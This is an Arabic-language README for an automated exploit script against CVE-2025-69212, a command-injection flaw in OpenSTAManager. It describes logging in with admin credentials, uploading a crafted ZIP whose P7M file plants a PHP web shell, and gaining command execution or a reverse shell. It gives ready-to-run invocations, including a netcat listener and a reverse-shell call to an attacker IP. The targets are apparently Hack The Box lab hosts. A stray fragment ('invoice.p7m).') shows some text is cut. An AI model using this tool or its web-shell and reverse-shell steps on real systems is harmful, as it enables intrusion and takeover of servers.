
استغلال آلي لثغرة CVE-2025-69212 لحقن الأوامر في OpenSTAManager، يتضمن مصادقة المسؤول (admin)، ورفع ملف ZIP خبيث، وقشرة عكسية (reverse shell) أو تنفيذ أوامر.
سكربت استغلال آلي بالكامل لثغرة CVE-2025-69212، وهي ثغرة حقن أوامر في OpenSTAManager. يقوم السكربت بالمصادقة باستخدام بيانات اعتماد المسؤول، وينشر قشرة ويب PHP خبيثة عبر ملف P7M مُصمم داخل أرشيف ZIP، ويتيح تنفيذ الأوامر أو الحصول على قشرة عكسية.
invoice.p7m).python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -r <LHOST> <LPORT>
أمثلة:
تنفيذ أمر واحد:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -c 'id'
الحصول على قشرة عكسية:
# Start your netcat listener in another terminal:
nc -lvnp 4444
# Run the exploit:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -r 10.10.14.1 4444